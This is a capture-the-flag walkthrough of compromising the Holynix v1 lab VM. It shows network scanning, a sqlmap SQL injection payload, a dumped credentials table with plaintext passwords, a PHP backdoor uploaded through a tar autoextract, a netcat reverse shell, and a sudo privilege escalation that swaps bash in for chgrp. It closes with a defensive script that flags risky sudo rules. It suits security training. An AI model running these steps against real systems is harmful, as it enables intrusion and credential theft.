Holynix: v1 – Walkthrough

Today I had trouble with a network configuration problem on this virtual machine. I tried many times to fix the box so I could exploit it. After 6 hours, I could access the IP via VMware.

OK. Let's get started.

┌─[[email protected]]─[~]
└──> netdiscover

 Currently scanning: 192.168.13.0/16   |   Screen View: Unique Hosts           
                                                                               
 14 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 840              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.0.1     60:e3:27:be:75:78      4     240  TP-LINK TECHNOLOGIES CO.,LTD
 192.168.0.100   34:97:f6:c3:0b:66      8     480  ASUSTek COMPUTER INC.       
 192.168.0.101   00:0c:29:bc:05:de      2     120  VMware, Inc.

 

The target IP is 192.168.0.101. Nmap and dirbuster are running now to gather system information.

┌─[✗]─[[email protected]]─[~]
└──> nmap -sV 192.168.0.101

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-02 02:17 +0630
Nmap scan report for 192.168.0.101
Host is up (0.00089s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:BC:05:DE (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
┌─[[email protected]]─[~]
└──> dirb http://192.168.0.101 -r

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.101/ ----
==> DIRECTORY: http://192.168.0.101/~bin/                                      
==> DIRECTORY: http://192.168.0.101/~mail/                                     
==> DIRECTORY: http://192.168.0.101/~sys/                                      
+ http://192.168.0.101/calender (CODE:200|SIZE:247)                            
+ http://192.168.0.101/cgi-bin/ (CODE:403|SIZE:329)                            
+ http://192.168.0.101/footer (CODE:200|SIZE:63)                               
+ http://192.168.0.101/header (CODE:200|SIZE:604)                              
+ http://192.168.0.101/home (CODE:200|SIZE:109)                                
==> DIRECTORY: http://192.168.0.101/img/                                       
+ http://192.168.0.101/index (CODE:200|SIZE:776)                               
+ http://192.168.0.101/index.php (CODE:200|SIZE:776)                           
+ http://192.168.0.101/login (CODE:200|SIZE:342)                               
+ http://192.168.0.101/messageboard (CODE:200|SIZE:249)                        
==> DIRECTORY: http://192.168.0.101/misc/                                      
+ http://192.168.0.101/server-status (CODE:403|SIZE:334)                       
+ http://192.168.0.101/transfer (CODE:200|SIZE:44)                             
==> DIRECTORY: http://192.168.0.101/upload/                                    
                                                                               
-----------------
END_TIME: Tue Jan  2 02:17:34 2018
DOWNLOADED: 4612 - FOUND: 11

Just port 80? Really? Let me try again to make sure, checking all ports.

nmap -p- -sS 192.168.0.101 -mtu 24

Same result. OK, let's explore port 80 in the browser.

http://192.168.0.101/index.php?page=login.php

It looks like file inclusion. I tested some file inclusion exploits but they did not work; I also tried fuzzing for /etc/passwd with hex decoding.

OK, now I need to check the login form. admin/admin does not work, but admin' in the username and password fields shows a SQL error. Yeah!

Let's try sqlmap:

┌─[[email protected]]─[~]
└──> sqlmap -u "http://192.168.0.101/index.php?page=login.php" --data="user_name=admin&password=admin&Submit_button=Submit" -p password --is-dba
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:26:34

[02:26:35] [INFO] resuming back-end DBMS 'mysql' 
[02:26:35] [INFO] testing connection to the target URL
[02:26:35] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: user_name=admin&password=admin' UNION ALL SELECT CONCAT(0x716b707071,0x6346586653424a444f50624c485042535672506245636f6b436e6d6650797656656d5a7a756b4a69,0x7176787171),NULL,NULL,NULL-- FqHO&Submit_button=Submit
---
[02:26:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[02:26:35] [INFO] testing if current user is DBA
[02:26:35] [INFO] fetching current user
current user is DBA:    False
[02:26:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.101'

[*] shutting down at 02:26:35

We can't upload a shell, so we need to dump all the data.

Database: creds                                                                                                      
Table: accounts
[11 entries]
+-----+--------+------------+----------------------+
| cid | upload | username   | password             |
+-----+--------+------------+----------------------+
| 1   | 0      | alamo      | Ih%40cK3dM1cR05oF7   |
| 2   | 1      | etenenbaum | P3n7%40g0n0wN3d      |
| 3   | 1      | gmckinnon  | d15cL0suR3Pr0J3c7    |
| 4   | 1      | hreiser    | Ik1Ll3dNiN%40r315er  |
| 5   | 1      | jdraper    | p1%40yIngW17hPh0n35  |
| 6   | 1      | jjames     | %40rR35t3D%40716     |
| 7   | 1      | jljohansen | m%40k1nGb0o7L3g5     |
| 8   | 1      | kpoulsen   | wH%407ar37H3Fed5D01n |
| 9   | 0      | ltorvalds  | f%407H3r0FL1nUX      |
| 10  | 1      | mrbutler   | n%405aHaSw0rM5       |
| 11  | 1      | rtmorris   | Myd%40d51N7h3NSA     |
+-----+--------+------------+----------------------+

OK, we got usernames and passwords. No need to wait for an admin login. Note that %40 is URL-encoded @. 😉 I use the last user, rtmorris.

Login succeeded and I found an uploader. OK, let's try to upload a PHP file. I created a backdoor PHP file and the upload succeeded, but I can't find my uploaded file. So what now?

http://192.168.0.101/index.php?page=bd.php
http://192.168.0.101/img/bd.php
http://192.168.0.101/upload/bd.php
http://192.168.0.101/transfer/bd.php
http://192.168.0.101/messageboard/bd.php

All of them error out. Where is my uploaded file? After thinking for a few minutes, I noticed these URLs:

==> DIRECTORY: http://192.168.0.101/~bin/                                                                            
==> DIRECTORY: http://192.168.0.101/~mail/                                                                           
==> DIRECTORY: http://192.168.0.101/~sys/

They are forbidden. OK, I need to enumerate more.

Yes, I see /etc/passwd. It is vulnerable to file inclusion, so I try to read the upload PHP file. The upload form submits to transfer.php. Let's read the transfer file:

<?php
if ( $auth == 0 ) {
	echo "<center><h2>Content Restricted</h2></center>";
} else {
	if ( $upload == 1 )
	{
		$homedir = "/home/".$logged_in_user. "/";
		$uploaddir = "upload/";
		$target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
		$uploaded_type = $_FILES['uploaded']['type'];
		$command=0;
		$ok=1;

		if ( $uploaded_type =="application/gzip" && $_POST['autoextract'] == 'true' ) {	$command = 1; }

		if ($ok==0)
		{
			echo "Sorry your file was not uploaded";
			echo "<a href='?index.php?page=upload.php' >Back to upload page</a>";
		} else {
			if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
			{
				echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br />";
				echo "The ownership of the uploaded file(s) have been changed accordingly.";
				echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
				if ( $command == 1 )
				{
					exec("sudo tar xzf " .$target. " -C " .$homedir);
					exec("rm " .$target);
				} else {
					exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
				}
				exec("/var/apache2/htdocs/update_own");
			} else {
				echo "Sorry, there was a problem uploading your file.<br />";
				echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
			}
		}
	} else { echo "<br /><br /><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?>

Now I know the process flow and found the user directory path. I logged in as rtmorris, so the path will be the following:

http://192.168.0.101/~rtmorris/
┌─[[email protected]]─[~/Desktop/test]
└──> tar czf bd.php.tar.gz bd.php

 

Time to connect back. I tried Python first but it failed, so I used bash.

┌─[✗]─[[email protected]]─[~/Desktop/test]
└──> nc -lvp 5555
listening on [any] 5555 ...
192.168.0.101: inverse host lookup failed: Unknown host
connect to [192.168.0.103] from (UNKNOWN) [192.168.0.101] 48302
python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/home/rtmorris$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/home/rtmorris$ 

Now I check sudo -l for the user and exploit!

sudo -l
User www-data may run the following commands on this host:
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /bin/chgrp
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /bin/mv
cp /bin/bash .
sudo chown root:root bash
sudo mv /bin/chgrp /bin/chgrp
sudo mv /tmp/bash /bin/chgrp
sudo chgrp
id
uid=0(root) gid=0(root) groups=0(root)
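From the defender's side, the sudo -l listing above is exactly what a sudoers review should catch: a web service account allowed to run mv, chown, chgrp and tar as root without a password, any one of which is enough to swap in a root-owned binary. The following Python script is an added example (not part of the original walkthrough) that parses sudo -l output like the one on this box and flags such rules; the list of file-takeover binaries is the example's own assumption.

```python
import re

# `sudo -l` output as printed on this box (constructed sample for the example).
SUDO_L_OUTPUT = """\
User www-data may run the following commands on this host:
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /bin/chgrp
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /bin/mv
"""

# Binaries that replace, re-own or unpack over arbitrary files. Granted to a
# service account as root without a password, any one of them lets the caller
# install a root-owned shell, as the walkthrough does with chown, mv and chgrp.
# This set is the example's own assumption, seeded from the four rules above.
FILE_TAKEOVER_BINARIES = {"mv", "cp", "chown", "chgrp", "chmod", "tar", "dd", "tee", "install"}

# One rule line of `sudo -l`: "(runas) TAG: TAG: command [args]".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text):
    """Parse `sudo -l` output into (runas_user, tags, command) tuples."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header and blank lines carry no rule
        runas_user = m.group("runas").split(":")[0].strip()  # "(root)" or "(ALL : ALL)"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append((runas_user, tags, m.group("cmd")))
    return rules


def find_file_takeover_rules(text):
    """Return the commands runnable as root with NOPASSWD that can overwrite or
    re-own files: the rules a sudoers review must remove or replace with a
    tightly argument-restricted helper."""
    flagged = []
    for runas_user, tags, cmd in parse_sudo_l(text):
        if "NOPASSWD" not in tags or runas_user not in ("root", "ALL"):
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]  # /bin/chgrp -> chgrp
        if cmd == "ALL" or binary in FILE_TAKEOVER_BINARIES:
            flagged.append(cmd)
    return flagged


if __name__ == "__main__":
    for cmd in find_file_takeover_rules(SUDO_L_OUTPUT):
        print(f"[!] passwordless root rule for file-takeover binary: {cmd}")
```

On this box the script reports all four rules; the upload handler's need for root tar and mv is better met by a dedicated helper that fixes the archive path and destination than by granting the generic binaries.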

Bingo! We got root! Thanks for reading. Happy hacking.